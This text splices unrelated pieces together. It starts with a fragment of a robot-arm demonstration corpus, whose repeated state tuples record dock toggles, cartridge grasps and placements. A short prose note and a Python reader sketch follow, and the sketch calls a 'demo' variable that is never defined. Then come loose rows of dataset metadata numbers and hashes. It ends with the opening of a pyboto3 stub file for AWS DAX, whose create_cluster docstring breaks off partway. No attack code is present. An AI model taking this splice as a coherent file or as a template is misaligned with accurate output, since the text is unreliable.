2.000000,
)
),
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("nothing","nothing")),
),
"press dock toggle",
(
2.000000,
"dock-body_6_2",
2.000000,
)
),
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("nothing","nothing")),
),
"press dock toggle",
(
2.000000,
"dock-body_7_2",
2.000000,
)
),
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("nothing","nothing")),
),
"move arm and grasp",
(
2.000000,
"c2",
)
),
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("nothing","c2")),
),
"move arm and grasp",
(
1.000000,
"c3",
)
),
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("c3","c2")),
),
"move grasped object",
(
1.000000,
"dock-body_6_1",
(
(0.999970, -0.007745, -0.000978, ),
(0.007745, 0.999970, 0.000160, ),
(0.000977, -0.000168, 1.000000, ),
),
(
(-0.427073, ),
(0.006338, ),
(0.104651, ),
),
)
),
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("c3","c2")),
),
"release",
(
1.000000,
)
),
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("nothing","c2")),
),
"move grasped object",
(
2.000000,
"dock-body_7_1",
(
(0.999850, 0.017327, -0.000185, ),
(-0.017327, 0.999850, 0.000377, ),
(0.000191, -0.000373, 1.000000, ),
),
(
(-0.430730, ),
(-0.007425, ),
(0.370435, ),
),
)
),
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("nothing","c2")),
),
"release",
(
2.000000,
)
),
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("nothing","nothing")),
),
"press dock toggle",
(
2.000000,
"dock-body_6_2",
1.000000,
)
),
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("nothing","nothing")),
),
"press dock toggle",
(
2.000000,
"dock-body_7_2",
1.000000,
)
),
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("nothing","nothing")),
),
"move arm and grasp",
(
2.000000,
"dock-body",
)
),
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("nothing","dock-body")),
),
"move grasped object",
(
2.000000,
"dock-case",
(
(0.999997, -0.002430, 0.000087, ),
(0.002430, 0.999997, -0.000161, ),
(-0.000086, 0.000161, 1.000000, ),
),
(
(-0.090493, ),
(-0.005461, ),
(0.001495, ),
),
)
),
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("nothing","dock-body")),
),
"release",
(
2.000000,
)
),
)
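Each top-level entry in the demo tuple above is a (state, action, arguments) triple, and each state is itself a tuple of (name, value) pairs whose final "gripping" pair records what the two grippers hold. That layout is inferred from the data itself, not from copct's documentation, so the reader below is only a hypothetical sketch.

# Hypothetical reader for the corpus layout inferred above: each entry is
# (state, action, args); the state's "gripping" pair holds gripper contents.
def summarize(demo):
    for state, action, args in demo:
        gripping = dict(state)["gripping"]
        print("%-22s gripping=%s args=%r" % (action, gripping, args))

summarize(demo)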
| 25.67201
| 40
| 0.564313
| 2,731
| 20,820
| 4.028195
| 0.027829
| 0.287974
| 0.054813
| 0.110535
| 0.963276
| 0.962822
| 0.96064
| 0.96064
| 0.96064
| 0.96064
| 0
| 0.072816
| 0.144476
| 20,820
| 810
| 41
| 25.703704
| 0.544801
| 0
| 0
| 0.874074
| 0
| 0
| 0.567867
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| 40e3d01010eb0f1e23a9b2d170b4652ca52171ed
| 110,182
| py
| Python
| pyboto3/dax.py
| gehad-shaat/pyboto3
| 4a0c2851a8bc04fb1c71c36086f7bb257e48181d
| ["MIT"] | 91
| 2016-12-31T11:38:37.000Z
| 2021-09-16T19:33:23.000Z
| pyboto3/dax.py
| gehad-shaat/pyboto3
| 4a0c2851a8bc04fb1c71c36086f7bb257e48181d
| ["MIT"] | 7
| 2017-01-02T18:54:23.000Z
| 2020-08-11T13:54:02.000Z
| pyboto3/dax.py
| gehad-shaat/pyboto3
| 4a0c2851a8bc04fb1c71c36086f7bb257e48181d
| ["MIT"] | 26
| 2016-12-31T13:11:00.000Z
| 2022-03-03T21:01:12.000Z
|
'''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def can_paginate(operation_name=None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
"""
pass
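A small usage sketch, assuming boto3 is installed and AWS credentials are configured (these module-level stubs only mirror the real client's methods): can_paginate lets a caller choose between paginated and plain calls at runtime.

import boto3

client = boto3.client('dax')
# Not every operation has a registered paginator; check before asking for one.
if client.can_paginate('describe_clusters'):
    for page in client.get_paginator('describe_clusters').paginate():
        print(page['Clusters'])
else:
    print(client.describe_clusters()['Clusters'])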
def create_cluster(ClusterName=None, NodeType=None, Description=None, ReplicationFactor=None, AvailabilityZones=None, SubnetGroupName=None, SecurityGroupIds=None, PreferredMaintenanceWindow=None, NotificationTopicArn=None, IamRoleArn=None, ParameterGroupName=None, Tags=None, SSESpecification=None):
"""
Creates a DAX cluster. All nodes in the cluster run the same DAX caching software.
See also: AWS API Documentation
Exceptions
:example: response = client.create_cluster(
ClusterName='string',
NodeType='string',
Description='string',
ReplicationFactor=123,
AvailabilityZones=[
'string',
],
SubnetGroupName='string',
SecurityGroupIds=[
'string',
],
PreferredMaintenanceWindow='string',
NotificationTopicArn='string',
IamRoleArn='string',
ParameterGroupName='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
],
SSESpecification={
'Enabled': True|False
}
)
:type ClusterName: string
:param ClusterName: [REQUIRED]\nThe cluster identifier. This parameter is stored as a lowercase string.\n\nConstraints:\n\nA name must contain from 1 to 20 alphanumeric characters or hyphens.\nThe first character must be a letter.\nA name cannot end with a hyphen or contain two consecutive hyphens.\n\n
:type NodeType: string
:param NodeType: [REQUIRED]\nThe compute and memory capacity of the nodes in the cluster.\n
:type Description: string
:param Description: A description of the cluster.
:type ReplicationFactor: integer
:param ReplicationFactor: [REQUIRED]\nThe number of nodes in the DAX cluster. A replication factor of 1 will create a single-node cluster, without any read replicas. For additional fault tolerance, you can create a multiple node cluster with one or more read replicas. To do this, set ReplicationFactor to a number between 3 (one primary and two read replicas) and 10 (one primary and nine read replicas). If the AvailabilityZones parameter is provided, its length must equal the ReplicationFactor .\n\nNote\nAWS recommends that you have at least two read replicas per cluster.\n\n
:type AvailabilityZones: list
:param AvailabilityZones: The Availability Zones (AZs) in which the cluster nodes will reside after the cluster has been created or updated. If provided, the length of this list must equal the ReplicationFactor parameter. If you omit this parameter, DAX will spread the nodes across Availability Zones for the highest availability.\n\n(string) --\n\n
:type SubnetGroupName: string
:param SubnetGroupName: The name of the subnet group to be used for the replication group.\n\nWarning\nDAX clusters can only run in an Amazon VPC environment. All of the subnets that you specify in a subnet group must exist in the same VPC.\n\n
:type SecurityGroupIds: list
:param SecurityGroupIds: A list of security group IDs to be assigned to each node in the DAX cluster. (Each of the security group ID is system-generated.)\nIf this parameter is not specified, DAX assigns the default VPC security group to each node.\n\n(string) --\n\n
:type PreferredMaintenanceWindow: string
:param PreferredMaintenanceWindow: Specifies the weekly time range during which maintenance on the DAX cluster is performed. It is specified as a range in the format ddd:hh24:mi-ddd:hh24:mi (24H Clock UTC). The minimum maintenance window is a 60 minute period. Valid values for ddd are:\n\nsun\nmon\ntue\nwed\nthu\nfri\nsat\n\nExample: sun:05:00-sun:09:00\n\nNote\nIf you don\'t specify a preferred maintenance window when you create or modify a cache cluster, DAX assigns a 60-minute maintenance window on a randomly selected day of the week.\n\n
:type NotificationTopicArn: string
:param NotificationTopicArn: The Amazon Resource Name (ARN) of the Amazon SNS topic to which notifications will be sent.\n\nNote\nThe Amazon SNS topic owner must be same as the DAX cluster owner.\n\n
:type IamRoleArn: string
:param IamRoleArn: [REQUIRED]\nA valid Amazon Resource Name (ARN) that identifies an IAM role. At runtime, DAX will assume this role and use the role\'s permissions to access DynamoDB on your behalf.\n
:type ParameterGroupName: string
:param ParameterGroupName: The parameter group to be associated with the DAX cluster.
:type Tags: list
:param Tags: A set of tags to associate with the DAX cluster.\n\n(dict) --A description of a tag. Every tag is a key-value pair. You can add up to 50 tags to a single DAX cluster.\nAWS-assigned tag names and values are automatically assigned the aws: prefix, which the user cannot assign. AWS-assigned tag names do not count towards the tag limit of 50. User-assigned tag names have the prefix user: .\nYou cannot backdate the application of a tag.\n\nKey (string) --The key for the tag. Tag keys are case sensitive. Every DAX cluster can only have one tag with the same key. If you try to add an existing tag (same key), the existing tag value will be updated to the new value.\n\nValue (string) --The value of the tag. Tag values are case-sensitive and can be null.\n\n\n\n\n
:type SSESpecification: dict
:param SSESpecification: Represents the settings used to enable server-side encryption on the cluster.\n\nEnabled (boolean) -- [REQUIRED]Indicates whether server-side encryption is enabled (true) or disabled (false) on the cluster.\n\n\n
:rtype: dict
Returns
Response Syntax
{
'Cluster': {
'ClusterName': 'string',
'Description': 'string',
'ClusterArn': 'string',
'TotalNodes': 123,
'ActiveNodes': 123,
'NodeType': 'string',
'Status': 'string',
'ClusterDiscoveryEndpoint': {
'Address': 'string',
'Port': 123
},
'NodeIdsToRemove': [
'string',
],
'Nodes': [
{
'NodeId': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123
},
'NodeCreateTime': datetime(2015, 1, 1),
'AvailabilityZone': 'string',
'NodeStatus': 'string',
'ParameterGroupStatus': 'string'
},
],
'PreferredMaintenanceWindow': 'string',
'NotificationConfiguration': {
'TopicArn': 'string',
'TopicStatus': 'string'
},
'SubnetGroup': 'string',
'SecurityGroups': [
{
'SecurityGroupIdentifier': 'string',
'Status': 'string'
},
],
'IamRoleArn': 'string',
'ParameterGroup': {
'ParameterGroupName': 'string',
'ParameterApplyStatus': 'string',
'NodeIdsToReboot': [
'string',
]
},
'SSEDescription': {
'Status': 'ENABLING'|'ENABLED'|'DISABLING'|'DISABLED'
}
}
}
Response Structure
(dict) --
Cluster (dict) --
A description of the DAX cluster that you have created.
ClusterName (string) --
The name of the DAX cluster.
Description (string) --
The description of the cluster.
ClusterArn (string) --
The Amazon Resource Name (ARN) that uniquely identifies the cluster.
TotalNodes (integer) --
The total number of nodes in the cluster.
ActiveNodes (integer) --
The number of nodes in the cluster that are active (i.e., capable of serving requests).
NodeType (string) --
The node type for the nodes in the cluster. (All nodes in a DAX cluster are of the same type.)
Status (string) --
The current status of the cluster.
ClusterDiscoveryEndpoint (dict) --
The configuration endpoint for this DAX cluster, consisting of a DNS name and a port number. Client applications can specify this endpoint, rather than an individual node endpoint, and allow the DAX client software to intelligently route requests and responses to nodes in the DAX cluster.
Address (string) --
The DNS hostname of the endpoint.
Port (integer) --
The port number that applications should use to connect to the endpoint.
NodeIdsToRemove (list) --
A list of nodes to be removed from the cluster.
(string) --
Nodes (list) --
A list of nodes that are currently in the cluster.
(dict) --
Represents an individual node within a DAX cluster.
NodeId (string) --
A system-generated identifier for the node.
Endpoint (dict) --
The endpoint for the node, consisting of a DNS name and a port number. Client applications can connect directly to a node endpoint, if desired (as an alternative to allowing DAX client software to intelligently route requests and responses to nodes in the DAX cluster).
Address (string) --
The DNS hostname of the endpoint.
Port (integer) --
The port number that applications should use to connect to the endpoint.
NodeCreateTime (datetime) --
The date and time (in UNIX epoch format) when the node was launched.
AvailabilityZone (string) --
The Availability Zone (AZ) in which the node has been deployed.
NodeStatus (string) --
The current status of the node. For example: available .
ParameterGroupStatus (string) --
The status of the parameter group associated with this node. For example, in-sync .
PreferredMaintenanceWindow (string) --
A range of time when maintenance of DAX cluster software will be performed. For example: sun:01:00-sun:09:00 . Cluster maintenance normally takes less than 30 minutes, and is performed automatically within the maintenance window.
NotificationConfiguration (dict) --
Describes a notification topic and its status. Notification topics are used for publishing DAX events to subscribers using Amazon Simple Notification Service (SNS).
TopicArn (string) --
The Amazon Resource Name (ARN) that identifies the topic.
TopicStatus (string) --
The current state of the topic.
SubnetGroup (string) --
The subnet group where the DAX cluster is running.
SecurityGroups (list) --
A list of security groups, and the status of each, for the nodes in the cluster.
(dict) --
An individual VPC security group and its status.
SecurityGroupIdentifier (string) --
The unique ID for this security group.
Status (string) --
The status of this security group.
IamRoleArn (string) --
A valid Amazon Resource Name (ARN) that identifies an IAM role. At runtime, DAX will assume this role and use the role\'s permissions to access DynamoDB on your behalf.
ParameterGroup (dict) --
The parameter group being used by nodes in the cluster.
ParameterGroupName (string) --
The name of the parameter group.
ParameterApplyStatus (string) --
The status of parameter updates.
NodeIdsToReboot (list) --
The node IDs of one or more nodes to be rebooted.
(string) --
SSEDescription (dict) --
The description of the server-side encryption status on the specified DAX cluster.
Status (string) --
The current state of server-side encryption:
ENABLING - Server-side encryption is being enabled.
ENABLED - Server-side encryption is enabled.
DISABLING - Server-side encryption is being disabled.
DISABLED - Server-side encryption is disabled.
Exceptions
DAX.Client.exceptions.ClusterAlreadyExistsFault
DAX.Client.exceptions.InvalidClusterStateFault
DAX.Client.exceptions.InsufficientClusterCapacityFault
